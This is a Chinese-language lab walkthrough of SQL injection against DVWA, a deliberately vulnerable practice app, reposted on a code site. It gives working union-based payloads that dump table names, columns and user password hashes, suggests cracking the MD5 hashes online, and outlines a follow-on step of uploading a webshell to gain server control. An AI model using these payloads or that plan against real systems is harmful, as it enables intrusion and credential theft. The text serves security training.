DVWA-SQL注入


SQL注入解題思路

  1. 尋找注入點,可以通過web掃描工具實現
  2. 通過注入點,嘗試得到連接數據庫的用戶名,數據庫名稱,權限等信息。
  3. 猜解關鍵數據庫表極其重要字段與內容。
  4. 通過獲得的用戶信息尋找后台進行登錄。
  5. 利用后台上傳webshell或一句話木馬,進一步提權拿到服務器權限。

 

 

1.隨便輸入id 1,2,3…… 進行測試,發現輸入正確的ID會返回First name和Sumame信息,輸入錯誤的id不會返回信息

 

2.使用 1'or'1'='1 遍歷出數據庫表中的所有內容。

 

3.此時我們可以通過使用user(),database(),version()三個內置函數使用 1' and 1=2 union select user(),database() --  (注意插入的命令的格式以及空格)得到連接數據庫的賬戶名,數據庫名稱,數據庫版本信息。

 

4.猜測表名,通過注入 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database()# 

 

5.猜測列名,通過注入 1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users'# 

 

6.猜測用戶密碼,通過注入 1' union select null,concat_ws(char(32,58,32),user,password) from users #  

7.得到的用戶后的字符串為哈希值,可以登陸 https://cmd5.com/ 對MD5進行在線破解為明文密碼。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM